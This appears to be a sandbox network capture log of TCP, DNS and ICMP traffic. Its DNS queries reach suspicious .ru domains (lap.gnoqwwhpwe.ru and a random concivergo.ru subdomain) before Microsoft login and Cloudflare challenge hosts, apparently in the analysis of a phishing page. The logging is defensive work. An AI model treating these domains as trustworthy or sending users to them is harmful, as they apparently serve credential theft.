                                                                                      Jan 9, 2025 05:11:10.857662916 CET4968080192.168.2.16192.229.211.108
                                                                                      Jan 9, 2025 05:11:13.264676094 CET4968080192.168.2.16192.229.211.108
                                                                                      Jan 9, 2025 05:11:13.627264977 CET49678443192.168.2.1620.189.173.10
                                                                                      Jan 9, 2025 05:11:15.077688932 CET49673443192.168.2.16204.79.197.203
                                                                                      Jan 9, 2025 05:11:18.073668003 CET4968080192.168.2.16192.229.211.108
                                                                                      Jan 9, 2025 05:11:23.231719017 CET49678443192.168.2.1620.189.173.10
                                                                                      Jan 9, 2025 05:11:27.688694000 CET4968080192.168.2.16192.229.211.108
                                                                                      Jan 9, 2025 05:11:41.678857088 CET4969780192.168.2.16199.232.214.172
                                                                                      Jan 9, 2025 05:11:41.678962946 CET4969880192.168.2.16199.232.214.172
                                                                                      Jan 9, 2025 05:11:41.684077978 CET8049697199.232.214.172192.168.2.16
                                                                                      Jan 9, 2025 05:11:41.684145927 CET4969780192.168.2.16199.232.214.172
                                                                                      Jan 9, 2025 05:11:41.684443951 CET8049698199.232.214.172192.168.2.16
                                                                                      Jan 9, 2025 05:11:41.684493065 CET4969880192.168.2.16199.232.214.172
                                                                                      Jan 9, 2025 05:11:59.786534071 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:11:59.786556959 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:11:59.786607027 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:11:59.786746979 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:11:59.786762953 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:00.433281898 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:00.433532000 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:12:00.433553934 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:00.433878899 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:00.434925079 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:12:00.434988022 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:00.482780933 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:12:01.669960022 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:01.670008898 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:01.670078039 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:01.670252085 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:01.670267105 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:01.685287952 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:01.685313940 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:01.685379028 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:01.685554028 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:01.685566902 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.163496971 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.163747072 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.163764954 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.164768934 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.164823055 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.165774107 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.165834904 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.165956020 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.165963888 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.206789017 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.259754896 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.260008097 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.260027885 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.260910034 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.260971069 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.261938095 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.261998892 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.262171984 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.262180090 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.301788092 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.334291935 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.334569931 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.334613085 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.335208893 CET49827443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.335218906 CET4434982735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.349386930 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.349412918 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.349466085 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.349687099 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.349695921 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.368122101 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.368191957 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.368223906 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.368753910 CET49825443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.368766069 CET4434982534.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.379894018 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.379914045 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.379977942 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.380196095 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.380204916 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.802932024 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.803193092 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.803216934 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.804094076 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.804147005 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.804435968 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.804491997 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.804763079 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.804769993 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.857798100 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.937994957 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.938122988 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.938178062 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.939130068 CET49831443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:02.939150095 CET4434983135.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.939930916 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.940152884 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.940165043 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.941145897 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.941217899 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.941580057 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.941627979 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.941725969 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.983336926 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.983788013 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:02.983794928 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:03.030788898 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:03.042063951 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:03.042105913 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:03.042196035 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:03.042798042 CET49832443192.168.2.1634.107.199.61
                                                                                      Jan 9, 2025 05:12:03.042804956 CET4434983234.107.199.61192.168.2.16
                                                                                      Jan 9, 2025 05:12:03.710675955 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:03.710695028 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:03.710773945 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:03.711014986 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:03.711029053 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.165672064 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.165931940 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.165947914 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.166273117 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.166588068 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.166666985 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.166732073 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.166821003 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.166857958 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.357525110 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.357619047 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.357676983 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.358280897 CET49836443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.358294010 CET4434983635.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.361609936 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.361660957 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.361774921 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.362027884 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.362041950 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.813152075 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.813520908 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.813544035 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.813884020 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.814209938 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.814295053 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.814410925 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.855343103 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.945730925 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.945801973 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:04.945904016 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.946674109 CET49837443192.168.2.1635.190.10.96
                                                                                      Jan 9, 2025 05:12:04.946696043 CET4434983735.190.10.96192.168.2.16
                                                                                      Jan 9, 2025 05:12:10.337220907 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:10.337291002 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:10.337534904 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:12:11.147563934 CET49815443192.168.2.16216.58.206.68
                                                                                      Jan 9, 2025 05:12:11.147595882 CET44349815216.58.206.68192.168.2.16
                                                                                      Jan 9, 2025 05:12:32.676110983 CET4970080192.168.2.16192.229.221.95
                                                                                      Jan 9, 2025 05:12:32.681282997 CET8049700192.229.221.95192.168.2.16
                                                                                      Jan 9, 2025 05:12:32.681358099 CET4970080192.168.2.16192.229.221.95
                                                                                      Jan 9, 2025 05:12:59.859683037 CET49839443192.168.2.16142.250.186.36
                                                                                      Jan 9, 2025 05:12:59.859710932 CET44349839142.250.186.36192.168.2.16
                                                                                      Jan 9, 2025 05:12:59.859807968 CET49839443192.168.2.16142.250.186.36
                                                                                      Jan 9, 2025 05:12:59.860033989 CET49839443192.168.2.16142.250.186.36
                                                                                      Jan 9, 2025 05:12:59.860050917 CET44349839142.250.186.36192.168.2.16
                                                                                      Jan 9, 2025 05:13:00.498795986 CET44349839142.250.186.36192.168.2.16
                                                                                      Jan 9, 2025 05:13:00.499211073 CET49839443192.168.2.16142.250.186.36
                                                                                      Jan 9, 2025 05:13:00.499233961 CET44349839142.250.186.36192.168.2.16
                                                                                      Jan 9, 2025 05:13:00.499536037 CET44349839142.250.186.36192.168.2.16
                                                                                      Jan 9, 2025 05:13:00.499985933 CET49839443192.168.2.16142.250.186.36
                                                                                      Jan 9, 2025 05:13:00.500040054 CET44349839142.250.186.36192.168.2.16
                                                                                      Jan 9, 2025 05:13:00.553034067 CET49839443192.168.2.16142.250.186.36
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 9, 2025 05:10:54.944327116 CET53549281.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:54.969413042 CET53541791.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:55.854671955 CET5628053192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:55.854821920 CET6067653192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:55.910628080 CET53562801.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:55.911293983 CET53606761.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:55.961199999 CET53577121.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:57.415904999 CET4932653192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:57.416256905 CET5983853192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:57.417169094 CET5269253192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:57.417313099 CET5067753192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:57.417587996 CET5574253192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:57.417706013 CET5085053192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:57.422650099 CET53493261.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:57.422880888 CET53598381.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:57.423861980 CET53526921.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:57.423938036 CET53557421.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:57.424305916 CET53508501.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:57.424318075 CET53506771.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.116317987 CET5671953192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.116482973 CET5945153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.123102903 CET53567191.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.123121023 CET53594511.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.163793087 CET5974253192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.163928986 CET6356153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.170411110 CET53635611.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.171066046 CET53597421.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.758347988 CET4931053192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.758510113 CET5234953192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.764964104 CET53493101.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.765136957 CET53523491.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.779695988 CET5181553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.779860973 CET5036153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:58.786514997 CET53518151.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:58.786526918 CET53503611.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:59.736251116 CET5892553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:59.736663103 CET5348353192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:10:59.743175030 CET53589251.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:10:59.743186951 CET53534831.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:00.748368979 CET5563353192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:00.748536110 CET5598053192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:00.755129099 CET53559801.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:00.755422115 CET53556331.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:07.738832951 CET6297153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:07.738965988 CET5001153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:07.827877045 CET53500111.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:07.899507046 CET53629711.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:09.409476995 CET6176553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:09.413170099 CET5792053192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:09.441802025 CET6348053192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:09.441988945 CET5082253192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:09.528697014 CET53634801.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:09.594753027 CET53508221.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:10.452872038 CET6408553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:10.453001976 CET6383153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:10.494324923 CET53638311.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:12.843368053 CET5770153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:12.843523026 CET5393453192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:12.876923084 CET53539341.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:12.946054935 CET53542281.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:13.934317112 CET5809553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:13.934473991 CET5766453192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:13.940972090 CET53580951.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:13.941363096 CET53576641.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:18.681678057 CET53579031.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:31.642754078 CET53614761.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:54.588507891 CET53640131.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:54.887299061 CET53493381.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:55.120496035 CET6250553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:55.120655060 CET5459553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:57.121943951 CET6477653192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:57.122088909 CET6297453192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:57.129044056 CET53647761.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:57.253694057 CET53629741.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:59.240014076 CET5874653192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:59.240592957 CET5009953192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:59.250858068 CET5642953192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:59.251884937 CET4916453192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:59.263962030 CET53501751.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:11:59.856337070 CET6423553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:11:59.856481075 CET6460553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:00.434263945 CET6471453192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:00.434535980 CET6370153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:00.460067987 CET138138192.168.2.16192.168.2.255
                                                                                      Jan 9, 2025 05:12:00.755740881 CET5399353192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:00.755886078 CET5029253192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.626332045 CET5006153192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.626475096 CET5132953192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.662456036 CET5697253192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.662606955 CET5962653192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.669441938 CET53569721.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:01.669565916 CET53596261.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:01.677468061 CET5230053192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.677613974 CET5033253192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.684588909 CET53523001.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:01.684600115 CET53503321.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:01.735207081 CET6370553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:01.736041069 CET5155353192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:02.337723017 CET6443353192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:02.337867022 CET6215653192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:02.344885111 CET53644331.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.348860979 CET53621561.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.371356964 CET6113353192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:02.371500015 CET5881453192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:02.378122091 CET53611331.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:02.379488945 CET53588141.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:24.841671944 CET53523451.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:59.851861954 CET6011453192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:59.852054119 CET4945553192.168.2.161.1.1.1
                                                                                      Jan 9, 2025 05:12:59.858453989 CET53494551.1.1.1192.168.2.16
                                                                                      Jan 9, 2025 05:12:59.858813047 CET53601141.1.1.1192.168.2.16
                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                      Jan 9, 2025 05:11:09.594872952 CET192.168.2.161.1.1.1c2bf(Port unreachable)Destination Unreachable
                                                                                      Jan 9, 2025 05:11:10.495062113 CET192.168.2.161.1.1.1c277(Port unreachable)Destination Unreachable
                                                                                      Jan 9, 2025 05:11:12.877018929 CET192.168.2.161.1.1.1c277(Port unreachable)Destination Unreachable
                                                                                      Jan 9, 2025 05:11:55.148652077 CET192.168.2.161.1.1.1c299(Port unreachable)Destination Unreachable
                                                                                      Jan 9, 2025 05:11:57.253798008 CET192.168.2.161.1.1.1c273(Port unreachable)Destination Unreachable
                                                                                      Jan 9, 2025 05:11:59.270442963 CET192.168.2.161.1.1.1c2ad(Port unreachable)Destination Unreachable
                                                                                      Jan 9, 2025 05:11:59.895526886 CET192.168.2.161.1.1.1c299(Port unreachable)Destination Unreachable
                                                                                      Jan 9, 2025 05:12:01.766222000 CET192.168.2.161.1.1.1c2ad(Port unreachable)Destination Unreachable
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 9, 2025 05:10:55.854671955 CET192.168.2.161.1.1.10x7890Standard query (0)lap.gnoqwwhpwe.ruA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:55.854821920 CET192.168.2.161.1.1.10x7fe7Standard query (0)lap.gnoqwwhpwe.ru65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.415904999 CET192.168.2.161.1.1.10x4530Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.416256905 CET192.168.2.161.1.1.10x8d0fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.417169094 CET192.168.2.161.1.1.10x6eaaStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.417313099 CET192.168.2.161.1.1.10xcf86Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.417587996 CET192.168.2.161.1.1.10xd42Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.417706013 CET192.168.2.161.1.1.10x73fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.116317987 CET192.168.2.161.1.1.10x4182Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.116482973 CET192.168.2.161.1.1.10x5b1fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.163793087 CET192.168.2.161.1.1.10xa1cfStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.163928986 CET192.168.2.161.1.1.10xa7b4Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.758347988 CET192.168.2.161.1.1.10xc208Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.758510113 CET192.168.2.161.1.1.10x5aa2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.779695988 CET192.168.2.161.1.1.10x71d1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.779860973 CET192.168.2.161.1.1.10x683eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:59.736251116 CET192.168.2.161.1.1.10x4000Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:59.736663103 CET192.168.2.161.1.1.10xdf58Standard query (0)www.google.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:00.748368979 CET192.168.2.161.1.1.10x72f5Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:00.748536110 CET192.168.2.161.1.1.10x3e33Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:07.738832951 CET192.168.2.161.1.1.10xf7d8Standard query (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ruA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:07.738965988 CET192.168.2.161.1.1.10x44a3Standard query (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.409476995 CET192.168.2.161.1.1.10xc91bStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
